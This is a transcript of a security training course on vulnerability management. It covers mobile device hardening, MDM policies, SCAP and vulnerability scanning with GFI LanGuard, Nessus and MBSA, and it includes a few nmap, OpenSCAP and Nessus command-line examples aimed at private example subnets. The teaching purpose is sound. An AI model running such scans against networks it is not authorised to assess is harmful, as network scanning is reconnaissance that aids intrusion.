with useless traffic. So, therefore, we should be using network intrusion detection and prevention systems to
detect anomalies, log and notify and ideally – with the prevention system – stop the activity from continuing if
it's suspicious.
We should encrypt all transmissions including internally on our local area networks. Now, to do that, you're
probably not going to go through configuring PKI certificates for every app. It's too much work. Instead, you
might use something like IPSec, which can apply to all traffic regardless of higher-level protocol. We should
always harden all devices on the network including things like user smartphones because a single
compromised smartphone could compromise the entire network.
We should have periodic network penetration testing because we can learn a lot from this about weaknesses we
might not realize were there and that were exploitable. Ideally, this can be done by a third party. However, we
could also have internal penetration tests conducted by our own IT teams. Periodic network vulnerability
assessments should also be conducted – again either internally or third party.
The difference between it and a pen test is that the pen test actually exploits weaknesses it finds. The
vulnerability assessment does not; it just reports on them. And the single biggest and most important factor here is user awareness and training about things like social engineering or trickery. All of the hardening that we've discussed is pretty much useless if users irresponsibly open file attachments in suspicious messages they were not expecting or click links on all kinds of web sites they should not be visiting.
[Topic title: Mobile Device Vulnerabilities. The presenter is Dan Lachance.] In this video, I'll talk about
mobile device vulnerabilities. These days, mobile devices are ubiquitous – everybody's got one, whether it's for
personal use, business use, or a little bit of both. The thing is that we need to treat mobile devices, like
smartphones, as full-fledged computers. They're exposed to numerous networks all the time and as a result,
there's a high possibility of infection or some kind of compromise. For example, if a user is using their smartphone on a public Wi-Fi network – and they do that quite often – the possibility exists that their device could be compromised or infected on that network. So, when they connect to a corporate network with that device,
problems could ensue. The other issue with mobile devices is that they're small and compact, and so therefore,
they're easily lost or stolen. So if they contain sensitive data, or if they contain apps that allow access to
sensitive data, there is a possibility of data leakage. We have to think about the storage on mobile devices – items such as SMS text messages, cached e-mail messages, internal storage or SD cards that might contain sensitive data, stored credentials, or even, for instance, PKI certificates that might be required for a smartphone to authenticate to a VPN appliance. Then there's the issue of the apps running on the mobile
device. Even trusted app stores, in some cases, have proven to host malware in apps that are certified to exist in those app stores.
So we're talking about even the big, popular app stores like Google Play for Android devices, the Microsoft
app store, the Apple iTunes app store. We need to be very careful, in terms of which apps are allowed to be
installed on mobile devices. Corporations will often use app sideloading if they've got custom developed
mobile apps. All that this means is that we've got the source files for the app and we're installing it or pushing
it out to the smartphone, for instance. Much like you'd push out an installation over the network to desktop
computers. So it's important, then, that we have policies that control the use or installation of certain types of
apps on mobile devices. Mobile devices can be logically partitioned or containerized. What this means, then, is
for BYOD, for bring your own device type of smartphones, where people bring their own personal phones and
use them for corporate use, we might have a personal partition containing personal app settings and data. And
likewise, we would also have a corporate partition on that same device containing corporate app settings and
data.
The beauty here is that we now have a way to selectively wipe corporate data, and apps and settings, from the
phone without affecting personal data in the personal partition. A mobile device management, or MDM
enterprise class solution, lets you apply policies to mobile devices to control them. So, to control things like
whether Bluetooth is enabled or not, whether the camera is enabled, SD card encryption being enforced,
preventing access to app stores. Even preventing data leakage between personal and corporate device
partitions. As an example, consider Microsoft's System Center Configuration Manager, or SCCM, which does
have some mobile device management options. [The System Center Configuration Manager window is
displayed. This window is divided into four sections.] Here in the left hand workspace area at the bottom left,
I've clicked on Assets and Compliance. And in the left hand navigator, I've gone under Compliance Settings,
where I've clicked on Configuration Items. I'm going to right-click and create a new configuration item,
specifically for mobile devices. [The Create Configuration Item Wizard opens. The first page is titled General.
He selects the Mobile device option in the Specify the type of configuration item that you want to create drop-
down list box.] And I'm going to call this Policy1. Now what I'm going to do here is set some policy settings
that control the behavior of mobile devices. So I'm going to click Next. [The next page is titled Mobile Device
Settings.] Now, what I could do is selectively choose different categories of settings, such as lets see Cloud
usage on the mobile device, Roaming options, Encryption options, even Password options. [These are some of
the checkboxes under the Mobile device setting groups section.] So I'm going to go ahead and do that, and then
I'll click Next. [The next page is titled Password.] Here we can see we've got password options related to the
mobile device. Also the amount of idle time, in minutes, before the device is locked – we can specify that here – and password complexity settings. Also, as I continue through the wizard, [The next page is titled
Cloud.] I've got options as to whether or not Cloud backup is allowed, whether photos are allowed to be
synchronized.
And as I progress through here, by clicking Next, I've also got roaming options. [The next page is titled
Roaming.] And if I go Next again, here I've got the encryption options that I asked for initially when starting
this wizard. [The next page is titled Encryption.] For example, we might want to make sure that we enable
Storage card encryption by turning it On. You'll notice too, that most mobile device management solutions will
have an auto remediation option. Here we see that in the bottom left with a check mark labeled Remediate
noncompliant settings. So, for mobile devices that don't meet these settings, the settings would be turned on for them. As
always, let's not forget that mobile devices have firmware. And sometimes there are firmware revisions that
can address security vulnerabilities. So we need to make sure we've got the latest firmware updates on our
mobile devices. Every mobile device is a full-fledged computer, really, so it should have an up-to-date malware
scanner, ideally with centralized notification of infections. A mobile device firewall, in other words a host
based firewall, should also be configured to prevent externally initiated connections to the mobile device. In
this video, we talked about mobile device vulnerabilities.
[Topic title: Vulnerability Scanning Overview. The presenter is Dan Lachance.] In this video, I'll do an
overview of vulnerability scanning.
Vulnerability scanning begins with identification of assets that have value to the organization. That could be in
the form of sensitive data, or specific business processes, or certain ingredients used to come up with a magic
mixture in the food industry and so on. After the assets have been identified, they then need to be prioritized
along with the likelihood of threats against those assets. We also have to weigh in what the organization's
appetite for risk is. Next, we can actually conduct a vulnerability assessment. This might be conducted by
internal IT staff or IT techies from a third party firm. Or it could also be conducted by a malicious black hat
user who's performing reconnaissance scans. What should be scanned in a vulnerability scanning session?
Well it depends on what it is you want to test for weaknesses. To identify weaknesses, you might be interested
in scanning the entire network. You might scan a single device on the network, or all devices on the network.
Maybe only certain types of devices have your interest. Maybe systems that are running Windows operating
systems are the only things you want to look for weaknesses on. You might also scan applications looking for
vulnerabilities, so all applications or specific applications. So when we start configuring our vulnerability scan,
we configure the scope. And that scope might be an entire network, a specific subnet, an IP address range, and
so on. [The GFI LanGuard 2014 window is open, which includes the Dashboard and Scan tabs.] Here I've got
a trial version of GFI LanGuard 2014. And here under the Scan area, I have the option of determining my scan
target, which defaults to localhost. Now, if I go ahead and click on the ellipsis button over on the right, that's
the button with three dots, [The Custom target properties dialog box opens. It includes the Add any computer
that satisfies one of the following rules section, which further includes the Add new rule link.] here I can add a
rule for computers that must meet certain conditions in order for them to be scanned. [He clicks the Add new
rule link and the Add new rule dialog box opens.]
So it could be based on computer names, I could maybe import a file that has computer names in it. Or a
specific domain name for Active Directory, an IP address range, even an organizational unit within Active
Directory. [These are some of the options under the Rule type drop-down list box.] So the idea is that we can
give it a scope of what it is we want to scan. Other considerations when configuring the scan settings are
whether or not you're going to conduct a credentialed or a non-credentialed scan. So this means that we either
give it credentials, so for example, perhaps we want to use the administrative credentials or the root credentials
and try to look for weaknesses. Or we might want to mimic an attacker that really doesn't know anything about
the environment, and we might want to conduct a non-credentialed scan. We can also run a manual or a
scheduled scan. Ideally, you should have scans scheduled to run automatically on a periodic basis, because
threats are ever changing. And so if we only conduct a vulnerability assessment scan once per quarter, once per
year, we might miss out on threats that are actually infiltrating our network. When you're configuring a
vulnerability scan, you'll always have an option where you can specify a specific set of credentials that you
want to use to conduct the scan. [He points to the Credentials drop-down list box under the Scan tabbed page
of the GFI LanGuard 2014 window.] Of course, you could also not specify any credentials, you could conduct,
in this case, a null session scan. But at the same time, if I were to go in this specific tool under the
Configuration menu, over on the left I'd see that I could also configure Scheduled Scans. [He right-clicks the
Scheduled Scans option under the Configuration section in the Configuration tabbed page and selects the New
scheduled scan option. As a result, the New scheduled scan wizard opens.] So that we're keeping up to date
with any weaknesses that might have not been apparent before, but things change. So running these scans
periodically is always a very important consideration. Scans can be run on the server, where the server reaches
out on its own and discovers devices on the network and how they're configured, and applications, and so on.
And whether you run a credentialed versus non-credentialed scan will determine how in-depth
the returned information really is. There is also agent-based scanning, where we must install a software agent
on given devices on the network that can provide more scanned information.
Or we might install agents on machines on the edge of a network that our permanent existing server-based
scanning can't reach. Most vulnerability scanners will have some kind of auto-remediation capabilities, even if
it's simply turning off options that are deemed insecure or applying updates that are missing. The results of a
scan will identify weaknesses but will not exploit them like a penetration test would. So there's not as much
risk for disruption of production systems when you conduct a vulnerability scan as there would be when you
would conduct a penetration test. So the results also allow us to improve or replace existing security controls.
So as we've seen, a vulnerability scan then is non-invasive. Discovered vulnerabilities are not exploited like
they are with pen tests. We should enable scheduled continuous monitoring of critical IT systems, in terms of
their availability, malware infections, even things like denial of service attacks. And that starts to fall
into that gray area of getting into intrusion detection and prevention systems.
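As a rough, tool-agnostic illustration of that scheduling idea, a periodic scan can be as simple as a cron entry that runs a scanner against a defined scope. The sketch below assumes nmap is installed and uses a hypothetical subnet and output directory; it is not meant to represent GFI LanGuard or any specific product.
# Minimal sketch: run a scoped service scan every Sunday at 2 AM via cron (crontab -e).
# The subnet and the output path are hypothetical examples.
0 2 * * 0 /usr/bin/nmap -sV 192.168.1.0/24 -oN /var/log/scans/weekly-$(date +\%F).txt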
The items that would be checked in a standard vulnerability scan would include things like open ports, which
tells us what services are viewable or reachable on the host. Any malware that might have been detected,
missing service packs, default operating system and app configurations that could present security
vulnerabilities, as well as insecure configurations. Also, we might check compliance with preconfigured
security baselines. So for example, here we've got a scan that's been conducted on a host running Windows
Server 2012 R2 64-bit. [He points to the Saved Scan Result node under the Scan Results Overview section of
the Scan tabbed page.] And we can see there are a few high security vulnerabilities. And if we click them, [He
clicks the High Security Vulnerabilities subnode and its content is displayed in the adjacent section named
Scan Result Details.] and then over on the right, expand the categories for Miscellaneous, we see that
AutoRun is enabled, that's a security risk. Under Software we've also got some information here talking about
a router or a firewall configuration, allowing source routing packets. And then we can take a look at other
vulnerabilities that are listed here. Here they're classified as low security vulnerabilities or high. And then
there's potential vulnerabilities, missing service packs. So all of these things are normally configurable when
we scan for weaknesses, either on a network, on a device, for an app, and so on. Whichever tool you happen to
use for vulnerability scanning, it's always important to make sure it's got an up to date vulnerability scanning
database, so it knows what to look for. Common vulnerability scanning tools include OpenVAS, Nessus,
Microsoft Baseline Security Analyzer, Nexpose and Qualys FreeScan.
[Topic title: Vulnerability Scanning Settings. The presenter is Dan Lachance.] In this video, I'll demonstrate
some common vulnerability scanning settings. Now there are plenty of vulnerability scanning tools, [The
Configuration tabbed page of the GFI LanGuard 2014 window is open.] but there are many settings that they all
have in common. For example, over here on the left I have a series of scanning profiles that can be used when I
conduct different types of scans. So, for instance, if I were to choose complete and combination scans, [He
selects the Complete/Combination Scans subnode in the Configurations section and its content is displayed in
the content section.] I've got full vulnerability assessment as a profile, which I can edit, by the way. And when I
click Edit this profile, I can determine exactly what is being done when that type of scanning profile is used to
conduct a scan. [The GFI LanGuard 2014 Scanning Profiles Editor dialog box opens.] So depending on your
tool, you'll have hundreds upon hundreds of items that get checked, and of course, you can customize by
removing check marks or by adding items. However, I'm going to leave that alone. Also, if I were to click, for
example, Network & Software Audit on the left, these are other types of scanning profiles. [He selects the
Network & Software Audit subnode in the Configurations section.] I can see I've got profiles here for scanning
for Trojan Ports, a generic Port Scanner, Software Audit, TCP & UDP Scans, and so on. Now of course we've
got scheduled scanning options if you want this to happen on an automated basis. But in this tool, GFI
LanGuard 2014, if I go to the Scan tab, then I can determine exactly what it is I want to scan. The scan target is
currently set to the localhost. [He points to the Scan Target drop-down list box under the Launch a New Scan
section in the Scan tabbed page.] However, if I click the ellipsis button, the button with the three dots over to
the right, here I can click the Add new rule link. [The Custom target properties dialog box opens. It includes the
Add any computer that satisfies one of the following rules section, which further includes the Add new rule
link. The Add new rule dialog box opens.] And for the rule type, I'll choose an IP address range, which lets me
specify starting and ending addresses. [He selects the IP address range is option in the Rule type drop-down list
box and points to the From and To text boxes under the Scan an IP address range radio button.] However, I
could specify whatever it is that I wish depending on what it is that I want to scan. So I'm just going to change
the addresses a little bit, [He enters 192.168.1.1 in the From text box and 192.168.1.254 in the To text box.] and
I'm going to click OK. And I'll click OK again, and now we can see it's filled in a custom range of IP addresses
based on the custom group settings. You see the name that's listed here. Now I can determine whether I want to
use any of those profiles that we looked at for conducting my vulnerability scan. [He points to the Scan Target
drop-down list box.] Do I want to do a full scan, or just a TCP and UDP scan? Maybe all I want to do is look at
last month's patches. So I've got profiles for that, or only missing patches, and so on. So I'm going to leave it on
full scan. [These are some of the options in the Profile drop-down list box under the Launch a New Scan
section.] I can tell it here which credentials I wish to use, so I've filled in some alternative credentials that
should work on most devices on my network. [He points to the Credentials drop-down list box under the
Launch a New Scan section.] So I've used the administrator username and the appropriate password. I can also
click Scan Options here to determine whether I want to wake up computers that are offline or shut them down
when the scan is complete. [He clicks the Scan Options link in the Launch a New Scan section and the Scan
Options dialog box opens. He points to the Wake up offline computers and Shut down computers after scan
checkboxes under the Power saving options section.] So at this point, I'm ready to start my scan. I'm going to
go ahead and click the Scan button over on the right. So we can now see that the scan has begun, and we're
starting to see in the left-hand window the first host that it found on the network with an address of
192.168.1.1. [He points to the result in the Scan Results Overview section.] Now, it says that the estimated scan
time remaining is approximately six hours. So the speed of your network, the type of scanning profile, and how
many hosts you're scanning will really determine exactly how long it takes. In this video, we learned how to
configure vulnerability scanning settings.
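As a hedged side note on the power saving options shown above, waking a powered-off machine before a scan can also be done from a Linux command line; this is only an illustrative sketch, not part of GFI LanGuard, and the MAC address and target range are made-up examples.
# Minimal sketch: wake a host by its MAC address (requires the wakeonlan package
# and a NIC with Wake-on-LAN enabled), then port scan the example address range.
wakeonlan 00:11:22:33:44:55
nmap -sS -p 1-1024 192.168.1.1-254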
Objectives
explain how the SCAP standard is used to measure vulnerability issues and compliance
[Topic title: SCAP. The presenter is Dan Lachance.] In this video, I'll talk about SCAP. SCAP is a NIST set of
specifications related to enterprise security that has a focus on Automation and Standardization.
It stands for Security Content Automation Protocol. And it can do things like verify that patches have been
installed correctly. It can check security configurations. It can scan for signs of security breaches. It can also be
used for forensic data gathering. SCAP addresses the difficulties that larger enterprises encounter in terms of
the large number of systems that need to be secured, especially when there are a wide variety of different
types of systems in use. Or different versions of operating systems, different versions of applications, even
using different security monitoring, management, and scanning tools. SCAP enumerations check against a
specific, standardized set of identifiers. It looks for software flaws, insecure configurations, and also known
vulnerable products that might be installed on a host. NIST offers SCAP accreditation for products through the
SCAP validation program.
A big part of SCAP is really dealing with automation, automated monitoring of systems, even in a real-time
situation, looking for suspicious activity, and also to look for things like misconfigurations and missing
patches. Also notifications are part of SCAP. And in some cases solutions can autoremediate noncompliant
configurations. SCAP can also be used as a vulnerability assessment tool, since it can identify problems with
configurations related to an operating system or a specific application even. SCAP reports can identify security
vulnerabilities and insecure configurations. Some examples of NIST-validated SCAP tools include IBM
BigFix Compliance, Nexpose, SCAP extensions for Microsoft System Center Configuration Manager or
SCCM, Qualys SCAP Auditor, the SAINT Security Suite, and finally, OpenSCAP. In this video, we talked
about SCAP.
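For a concrete but hedged example, the open-source OpenSCAP scanner can evaluate a host against SCAP content from the command line. The profile ID and content file path below are placeholders that vary by distribution; treat this as a sketch rather than a definitive command for your environment.
# Minimal sketch: evaluate the local host against an SCAP (XCCDF) benchmark with OpenSCAP.
# The data stream path and profile ID are distribution-specific placeholders.
oscap xccdf eval \
  --profile xccdf_org.ssgproject.content_profile_standard \
  --results scan-results.xml \
  --report scan-report.html \
  /usr/share/xml/scap/ssg/content/ssg-debian-ds.xml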
Objectives
[Topic title: Scan for Vulnerabilities using Nessus. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to conduct a vulnerability scan using Nessus.
[The Download Nessus page of the tenable.com web site is open.] Nessus is a widely used vulnerability
scanning tool that runs on different platforms. But if you're using Kali Linux which already contains many
security tools, you'll notice that Nessus isn't included. But that's no problem, we can easily go to the
tenable.com web site where we can download the Nessus tool. So as I scroll down on that page, I can select
Windows, Mac OS X, Linux or FreeBSD. So because I'm going to be running Nessus on Kali Linux, I'm going
to expand Linux, where I can download the 64 or 32-bit Debian package. Now at the same time, I can scroll
down even further and I can choose the Get an activation code button. [The presenter clicks this button and the
Obtain an Activation Code page opens.] Now, from here, I have the option of determining if I want to use
Nessus Home for free, which limits me to scanning 16 hosts. Or I could go with Nessus Professional by paying
a yearly fee. So if I wanted to go with the evaluation free version for home I would simply click Register Now.
Specify some email address information, it's completely free, and it would then email me my activation code.
Now once you've downloaded the installer, the Debian package, you can install it here at the command line
using the dpkg command-line tool with the -i option. [He highlights the dpkg -i Nessus-6.8.1-debian6_amd64.deb
command in the root@kali command prompt window.] Now once
you've installed this, it tells you to start the Nessus daemon. And then it tells us to point our web browser to
https, whatever the host name is, port 8834. Let's switch back to the Kali Linux Iceweasel browser, and let's
actually connect to the Nessus config page. [He opens the Nessus Home / Scans web page. At the top of this
page are two tabs, Scans and Policies.] Now if you're prompted for credentials, specify the username and
password that you would have created when you first configured Nessus. So I don't have any scans here, so
I'm going to go ahead and click the New Scan link over on the left, [He clicks the New Scan button and the
Scan Library subpage opens.] which gives me a list of templates.
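Stepping back for a moment, the install steps described a little earlier would look roughly like the following at a root prompt on Kali. The package file name matches the one shown in the demo, and the nessusd service name is an assumption about how the daemon is registered with systemd.
# Minimal sketch of the Nessus install steps described above (run as root on Kali).
# The .deb file name and the nessusd service name are assumptions for illustration.
dpkg -i Nessus-6.8.1-debian6_amd64.deb
systemctl start nessusd
# Then browse to https://<hostname>:8834 to finish setup in the web UI.
With that recap out of the way, back to the list of scan templates.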
Notice some of these templates, the ones that have the purple bar, require an upgrade. But there's still some
very powerful things I can evaluate here with the Nessus Home Edition. I'll start by clicking the Basic Network
Scan template. [The New Scan / Basic Network subpage opens. It is divided into two sections. The left section
is the navigation pane, which contains the BASIC, DISCOVERY, ASSESSMENT, REPORT, and ADVANCED
subsections. The BASIC subsection includes the General and Schedule options. The right section displays the
content of the option selected in the left section. The General option is selected by default and its content is
displayed, which includes the Name, Description, and Targets text boxes.] I'm going to call this new scan
Basic Network Scan- Chicago Subnet 1. [He types this in the Name text box.] So down below, I have to
specify the targets, whether it's a single host or a network range. I'm going to specify the network range of
192.168.1.1-192.168.1.254. Now over on the left, I can also click on other options I want to include in this
scan such as Scheduling. [He selects the Schedule option in the left section. Its content includes the Enable
Schedule toggle button.] Currently the schedule is not turned on, but I could turn on the schedule to determine
when I want this vulnerability assessment to be conducted. However, I will leave it on manual invocation,
which was the default setting. Under DISCOVERY on the left, I'm going to click on that link to determine
exactly how hosts are discovered. [He clicks the DISCOVERY subsection and its content is displayed.] Here
it's going to conduct a common port scan but I could choose from the list from other profiles such as Port scan
(all ports), or even I could choose Custom. [He points to the Scan Type drop-down list box.] I'm going to leave
it on Port scan (common ports). For ASSESSMENT, over on the left, [He selects the ASSESSMENT
subsection.] I can also determine what types of items I want to specify, in terms of what I want to scan for. So
here I'm going to choose Scan for all web vulnerabilities (quick) [He selects this option in the Scan Type drop-
down list box.] and down below, I can see exactly what it's going to do.
So let's go ahead and Enable CGI scanning; it's going to start crawling from the root of the web site and so on. I've
got a few report options here I might be interested in, [He selects the REPORT subsection.] such as allowing
the results of the scan to be editable [He points to the Allow users to edit scan results checkbox.] or displaying
hosts that respond to ping, [He points to the Display hosts that respond to ping checkbox.] or displaying even
unreachable hosts within the range that I specified. [He points to the Display unreachable hosts
checkbox.] And on ADVANCED, if I click on that on the left, [He selects the ADVANCED subsection.] I've
got a few options here related to performance as I'm running the scan. So when I'm happy with my settings, I'll
go ahead and Save what I've configured, [He clicks the Save button at the bottom of the subpage. Now the My
Scans list in the Nessus Home / Scans web page includes the Basic Network Scan - Chicago Subnet 1 list
item.] because the next thing we'll do, because we didn't configure scheduling, is we'll have to invoke it
manually. We can do that from this list by clicking the Launch button, it looks like the play button. So I'm
going to go ahead and click on that [He clicks the Launch button adjacent to the list item.] and I can now see
the timestamp from when it started conducting this scan. At any point in time, while the scan is running, I can
click on this little Running icon. [He clicks the Running icon adjacent to the list item and the Basic Network
Scan - Chicago Subnet 1 subpage opens.] And it will take me into another page that shows me what it's
discovered so far, in terms of the number of hosts, and any vulnerabilities it might have found on them so far.
So here we only see it's started scanning the first IP address in the range and it found one host, but we really
don't have much more. But as we wait a little bit longer we'll see this screen updating as it discovers more
hosts and vulnerabilities. Ideally no vulnerabilities, but that's why we're running this tool. So let's wait a few
minutes, and then we'll come back and see what it's found. So now that the scan's been running for a few
minutes, we can see it's discovered numerous hosts on the network. Now, most of these look good because
blue, according to the legend, is just informational messages about the device. However, other colors, like when
we start getting into the oranges, or red if it finds critical vulnerabilities, need to draw our attention.
So here we've got a host that apparently has one, [He points to the host IP address 192.168.1.1.] there's a little
number one here, one medium vulnerability. Now to get details about what that is, I could click on the IP
address for that host over on the left. That's going to jump me into a page specifically about that device and
what's been learned so far, [This page displays information about the IP address such as the severity, plugin
name, and count.] bear in mind, the scan is still not complete. So here we've got a medium vulnerability that
was found related to the DNS Server Cache.
At the same time, I can also see over here, the IP address, the DNS name and when this scan was started for
this particular host. I can even download a report of found vulnerabilities here to a file, [This information is
available under the Host Details section.] so I can then deal with a remediation of those discovered issues.
Now, I'm going to go back to the scans screen, so I'll click on the Scans link at the top of the screen. [The
Nessus Home / Scans page opens.] At any point in time, I can go ahead and pause or stop that scan, [He points
to the Pause and Stop buttons adjacent to the list item under the My Scans list.] and after it's stopped, I'll get
an X here. I can even delete it in the future. However, I'm just going to click stop. Now it asks me if I'm sure I
want to stop the scan, now realistically, you want it to continue. However, in the interest of time here, we're
going to stop it. Another interesting thing we can do here in Nessus is go up to the Policies link, where we can
build a new policy. [He clicks the New Policy button in the Policies tabbed page and the Policy Library
subpage opens. It includes several template options.] This really essentially lets us build a custom set of
settings that we can base scans on. So here in my scanner templates, in this example, I'll choose Host
Discovery. [The New Policy / Host Discovery subpage opens. It is divided into two sections. The left section is
the navigation pane, which contains the BASIC, DISCOVERY, and REPORT subsections. The BASIC
subsection includes the General and Permissions options. The General option is selected by default and its
content is displayed in the section on the right. It contains two text boxes, Name and Description.] Then I'm
going to call this CustomHostDiscovery1. And on the left I'll click DISCOVERY, to see exactly how it's
discovering hosts on the network. [The content of the DISCOVERY subsection includes the Scan Type drop-
down list box.] Sometimes you might want to first just identify what exists on the network before you
actually conduct a detailed scan of those devices. So here I'm going to choose OS Identification [He selects
this option in the Scan Type drop-down list box.] for OS fingerprinting, and I'm going to click Save. So now
I've got a saved policy called CustomHostDiscovery1, [The Policies tabbed page now includes the
CustomHostDiscovery1 item under the All Policies list.] but how do I use this? Well, what I need to do is click
on the Scans link up at the top. And when I click New Scan on the left, if I scroll all the way down to the
bottom, I'm going to see my custom policies, such as my CustomHostDiscovery1 policy. [This policy appears
under the User Created Policies section in the Scan Library subpage.] So from there, if I load that up by
clicking on it, I can build a new scan, schedule it, and then start conducting my vulnerability assessment based
on these customized settings.
Objectives
[Topic title: Common Vulnerability Scanning Tools. The presenter is Dan Lachance.] In this video I'll talk
about common vulnerability scanning tools.
The goal of vulnerability scanning is to identify and address weaknesses. Although unlike penetration testing,
we aren't testing the behavior when we try to exploit those weaknesses. So therefore, vulnerability scanning is
quite passive and shouldn't disrupt production systems. The database used by the vulnerability scanning tool
needs to contain known security misconfigurations, common attack vectors, known suspicious activity, and also
remnants of known suspicious activity. Now, this database, of course,
needs to be updated as these things change over time. With a noncredentialed scan, we get similar results that
would be achieved when a malicious user does scanning during reconnaissance. Whereas a credentialed scan
has access to systems. And it really kind of mimics a compromised account within the company and what
could be learned using that compromised account. Vulnerability scanning tools often have other abilities, such
as the ability to correlate scan results with past activity to see what's changed. It could also have the ability to
identify false positives that might even be configurable in some tools. We can also compare scan results with
best practices, and in some cases, auto-remediate devices that don't adhere to best practices. We can also
compare current scan results with previous scan results overall. This way, we can plan response plan priorities
when it comes to incident response.
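To make the credentialed versus noncredentialed distinction a little more concrete, here is a hedged, generic example of a noncredentialed check using nmap's vulnerability-related NSE scripts rather than any of the GUI tools discussed in this course; the target address is hypothetical.
# Minimal sketch: a noncredentialed vulnerability-style check from the network side.
# -sV fingerprints service versions; --script vuln runs NSE scripts in the "vuln" category.
nmap -sV --script vuln 192.168.1.10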
There should always be ongoing scans, since the threat landscape is changing all of the time. Some
vulnerability scanning tools are command line based. Others have a GUI, like GFI LanGuard, which I'm using
here. [The configuration tabbed page of the GFI LanGuard 2014 window is open.] Regardless of the solution
of your choice, they have a lot of commonalities in terms of their functionality. For instance, here under
Agents Management on the left, [The presenter points to the Agents Management option under the
Configurations section, which is selected by default. Its content is displayed in the content section.] I can
deploy agents to other computers for further scanning. I also have the option on the left of configuring a
Scanning Profile. For instance, I'll click the Vulnerability Assessment scanning profile on the left. [He clicks
the Vulnerability Assessment subnode of the Scanning Profiles node under the Configurations section.] Then
over on the right, maybe for High Security Vulnerabilities, [Its content includes the High Security
Vulnerabilities list item. There is the Edit this profile link adjacent to this item.] I'll click the Edit this profile
link. [The GFI LanGuard 2014 Scanning Profiles Editor dialog box opens.] So essentially, I can customize
what I am scanning for within my Vulnerability Assessment. [The dialog box includes the Profile categories
section, which further includes the Vulnerability Assessment option.] So here we've got hundreds upon
hundreds of High Security Vulnerabilities that get checked. [The content of the Vulnerability Assessment
option is displayed in the content section of the dialog box.] And I have the option, of course, of deselecting
some if I don't want to check them. The more things you're checking for, the longer it takes. But then at the
same time, the more thorough the scan results that you get in the end. Over on the left, I also have the option of
Scheduling Scans. [He right-clicks the Scheduled Scans node under the Configurations section and selects the
New scheduled scan option from the shortcut menu. As a result, the New scheduled scan wizard
opens.] Scheduling scans is important so that we scan either a single computer or a bunch of computers on the
network or the whole network. So that we are keeping up to date with any newer threats or newer suspicious
activity.
We also have the option in many of these vulnerability scanning tools to store an application inventory. [He
clicks the Applications Inventory node under the Configuration section and its content is displayed in the
content section.] It will scan for software installed on devices so it can give you recommendations on whether
or not something should be removed or configured differently. There's also software updating, which I've
clicked on in the left hand-navigator here, [He clicks the Software Updates node under the Configuration
section and its content is displayed in the content section.] where we can configure software updates that
would be automatically downloaded or autodeployed to machines that are missing them. All vulnerability
scanners have some kind of an option for alerting. [He clicks the Alerting Options node under the
Configuration section.] For example, sending an email message to administrators by connecting to a mail
server. Vulnerability scanners always have a database that they use when they conduct vulnerability
assessments, and that database must be kept up to date. [He clicks the Database Maintenance Options node
under the Configuration section.] But, for example, if I were to go into Program Updates on the left in this
tool, [He clicks the Program Updates node under the Configuration section and its content is displayed in the
content section.] then I can see I've got options for the Vulnerabilities Database Update, and I can see when it
was last kept up to date. You'll find common vulnerability scanning tools from Qualys. Nessus is a widely used
vulnerability scanning tool that we'll take a look at in another Linux demonstration. There's
OpenVAS, Nexpose, Nikto, Microsoft Baseline Security Analyzer, and the list goes on and on and on.
Objectives
[Topic title: Scan for Vulnerabilities using Microsoft Baseline Security Analyzer. The presenter is Dan
Lachance.] There are quite a lot of tools out there that will let you conduct a vulnerability scan of a Unix,
Linux or Windows host. In this video I'll demonstrate how to use the free Microsoft Baseline Security
Analyzer, or MBSA, to conduct a scan.
So I've already downloaded and installed the Microsoft Baseline Security Analyzer. You can see I've got a
shortcut icon here on my desktop. So I'm going to go ahead and double-click to launch the tool. [The Microsoft
Baseline Security Analyzer 2.3 window opens. It includes a section, which is titled Check computers for
common security misconfigurations. This section includes the Scan a computer and Scan multiple computers
options.] Now here, MBSA can be used to scan a single computer for vulnerabilities or multiple computers.
Here, I'll choose Scan a computer. [A page opens that is titled Which computer do you want to scan? It
includes the Computer name and IP address drop-down list boxes. It also includes the Security report name
text box.] It automatically picks up the local computer name, but I could also have specified the IP address.
The report that it generates will use these variables where %D is for the name of the domain, %C is for the
computer name and so on. I'm going to accept the defaults for that. The options that have selection marks by
default include checking for Windows administrative vulnerabilities, weak passwords, IIS administrative
vulnerabilities, SQL server administrative vulnerabilities. And just to check that security updates have been
installed successfully on the host. [These are the checkboxes present under the Options section of the
page.] So at this point, I'm going to go ahead and click the Start Scan button in the bottom right. And we can
now see that it's getting the latest security update information from Microsoft online and it's begun to scan. [A
page opens that is titled Report Details for QUICK24X7 - CM001.] So now that it's had a chance to scan, we
can see the results of our security vulnerability scan on this host, specifically called CM001.
So as we scroll down further through the results, we can see where there were problems. In this case for SQL
Server, we're missing security updates, as well as for Windows and for Silverlight as well as System
Center. [These issues are displayed under the Security Update Scan Results section.] But as we keep going
through, we'll get a sense of what was scanned and where the problems are. Such as automatic updates not
being installed on the computer even though there are outstanding updates, or more than two administrative
accounts found on the machine. Password settings, Windows Firewall problems, as well as file system
scans. [These issues are displayed under the Administrative Vulnerabilities section.] Checking to see which
services are currently running but may not be necessary because they're not being used. [He points to the
Additional System Information section.] IIS web server issues that we have to address. In this case, there are
none, they all have a green shield symbol. And as you can see as we scroll down, we can see all of the items
that were tested. In this case for SQL Server, we have a number of items like SQL service accounts and
password policies. So different vulnerability scanning tools will scan a single host, as we've done here, or
numerous hosts and will report on different items. Down at the bottom, of course, here we can print the report
or copy it to the clipboard so we can work with this data in other tools. [These options are available at the
bottom of the page.]
In this video, we learned how to scan a host for vulnerabilities using the Microsoft Baseline Security Analyzer.
Objectives
[Topic title: Review Vulnerability Scan Results. The presenter is Dan Lachance.] In this video, we'll take a
look at the result of a vulnerability scan.
Now, there are plenty of tools that can conduct vulnerability scans. Here we've got GFI LanGuard 2014, [The
Scan tabbed page of the GFI LanGuard 2014 window is open.] where we've already conducted a scan of an IP
range. And we can see by looking at the Scan Results Overview that it found numerous hosts on the
network. [He points to the Scan Results Overview section in the Scan tabbed page.] Now, the host that we're
currently running this from is a different color listed down here towards the bottom left of the listing of hosts.
However, what I'm going to do is pick on, let's say, the computer here with the name of LIVINGROOM,
which apparently is running Windows 10. And I'm going to expand the Vulnerability Assessment on that host
in the left-hand navigator. Then I'll click Low Security Vulnerabilities. [In the Scan Results Overview section,
he clicks the Low Security Vulnerabilities subnode under the Vulnerability Assessment node of the
192.168.1.94 address. Its content is displayed in the Scan Results Details section.] Here it talks about HTTPS,
running and HTTP running. So in other words, there's a web server. Now, if that's not what you expected
because that might be a workstation, that's a problem. It's got a larger attack surface than it really needs. And
we all know that to harden a system, you should really only make sure it runs what is absolutely required and
